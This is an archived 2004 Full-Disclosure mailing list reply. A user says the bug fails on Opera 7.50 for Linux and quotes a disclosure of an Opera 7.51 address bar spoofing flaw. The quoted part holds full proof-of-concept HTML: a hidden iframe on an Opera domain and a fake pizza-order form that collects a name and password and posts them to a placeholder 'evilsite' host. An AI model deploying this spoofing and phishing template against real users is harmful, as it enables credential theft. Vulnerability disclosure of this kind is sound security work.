[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20040618222448.34a0d575@janmobil>
From: jan_kantert at web.de (Jan Kantert)
Subject: Opera Browser version 7.51 Address Bar
Spoofing Vulnerability
Hi!
Seems if It does not work in Opera 7.50 on Linux.
Jan
Am Fri, 18 Jun 2004 12:39:22 +0000
schrieb "winter bitlance" <bitlance_3@...mail.com>:
> Hi List.
>
> A vulnerability is found in the Opera browser version 7.51 , which can be
> exploited by spammers to spoof information displayed in the address
> bar.Tested on Windows OS.
>
> Demonstration HTML source code:
>
> ======== begin ========
> [!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
> [html lang="en"]
> [head]
> [meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
> [meta http-equiv="Content-Script-Type" content="text/javascript"]
> [meta http-equiv="Content-Style-Type" content="text/css"]
> [meta http-equiv="REFRESH"
> content="0;url=javascript:(function(){})();"]
> [title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
> [script type="text/javascript"]
> [!-- hide JavaScript from old browsers
> var dummy="Do not remove this script element.";
> // end hiding JavaScript --]
> [/script]
> [style type="text/css"]
> [!-- /* hide iframe element. */
> iframe {
> display: none !important;
> }
> /* hide iframe element. */ --]
> [!-- /* pizza form */
> body {
> margin-left: 2em;
> margin-right: 2em;
> font-family:verdana;
> font-size:80%;
> }
> h1 { font-size:120%;}
> h2 { font-size:100%;}
> table { font-size:85%; background-color:buttonface; }
> table caption {
> background-color:activecaption; color:captiontext;
> font-weight:bold; text-align:left; }
> table table { font-size:100%; }
> table input { font-family:verdana; font-size:100%; }
> table select { font-family:verdana; font-size:100%; }
> /* pizza form */ --]
> [/style]
> [/head]
> [body]
> [h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
> [h2]Tested on Windows OS[/h2]
> [p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need
> Online"]
> Opera 7.51[/a], Everything You Need Online
> [/p]
> [iframe title="inline frame spoofing address bar"
> src="https://pizza.opera.com/order.html"]
> This inline frame is hidden. See CSS.
> [/iframe]
> [!-- below, phishing form order pizza --]
> [h2]Welcome to Pizza Opera dot Com[/h2]
> [form name="frmPizza" action="phishing://evilsite.tld"]
> [table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
> [caption]Order Your Pizza[/caption]
> [tr valign="top"]
> [td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
> [td][input type="text" name="txtName" id="txtName"][/td]
> [/tr]
> [tr valign="top"]
> [td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
> [td][input type="password" name="txtPassword" id="txtPassword"][/td]
> [/tr]
> [tr valign="top"]
> [td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
> [td]
> [select name="selSize" id="selSize"]
> [option value="0"]--- pick a size --- [/option]
> [option value="1"]Small[/option]
> [option value="2"]Medium[/option]
> [option value="3"]Large[/option]
> [/select]
> [/td]
> [/tr]
> [tr valign="top"]
> [td colspan="2"]
> [fieldset id="fstCrust"]
> [legend]Crust[/legend]
> [table cellpadding="1" cellspacing="0"]
> [tr]
> [td][input type="radio" name="radCrust" id="radCrust_Thick"
> value="Thick"][/td]
> [td][label for="radCrust_Thick"
> accesskey="K"]Thic[u]k[/u][/label][/td]
> [td][input type="radio" name="radCrust" id="radCrust_Thin"
> value="Thin"][/td]
> [td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
> [/tr]
> [/table]
> [/fieldset]
> [/td]
> [/tr]
> [tr valign="top"]
> [td colspan="2"]
> [fieldset id="fstToppings"]
> [legend]Toppings[/legend]
> [table cellpadding="1" cellspacing="0"]
> [tr]
> [td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
> [td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
> [/tr]
> [tr]
> [td][input type="checkbox" name="chkPineapple" id="chkPineapple"
> value="Pineapple"][/td]
> [td][label for="chkPineapple"
> accesskey="I"]P[u]i[/u]neapple[/label][/td]
> [/tr]
> [tr]
> [td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese"
> value="Extra Cheese"][/td]
> [td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra
> Cheese[/label][/td]
> [/tr]
> [/table]
> [/fieldset]
> [/td]
> [/tr]
> [tr valign="top"]
> [td colspan="2" align="right"][input type="submit" value=" Order!
> "][/td]
> [/tr]
> [/table]
> [/form]
> [/body]
> [/html]
> ========= end =========
> (Sorry,too long code.)
>
> Thank you, List.
>
> --
> bitlance winter
>
> P.S.
> I tender my acknowledgment to my godparent who has named 'bitlance'.
>
> _________________________________________________________________
> Watch the online reality show Mixed Messages with a friend and enter to win
> a trip to NY
> http://www.msnmessenger-download.click-url.com/go/onm00200497ave/direct/01/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
--
Stopt Softwarepatente, sonst wird Softwareentwicklung in Europa f?r die
meisten illegal!
Infos: http://webshop.ffii.org
320.000 Stimmen, 2000 Firmen gegen Logikpatente http://noepatents.org/
Innovation statt Patentinflation http://swpat.ffii.org/
Bitte senden Sie mir keine Word- oder PowerPoint-Anh?nge.
Siehe http://www.fsf.org/philosophy/no-word-attachments.de.html
Alle Rechtscheibfehler in dieser Mail sind urheberrechtlich gesch?tzt.
F?r Grammatikfehler wird keine Haftung ?bernommen.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040618/3edd2c0c/attachment.bin
Powered by blists - more mailing lists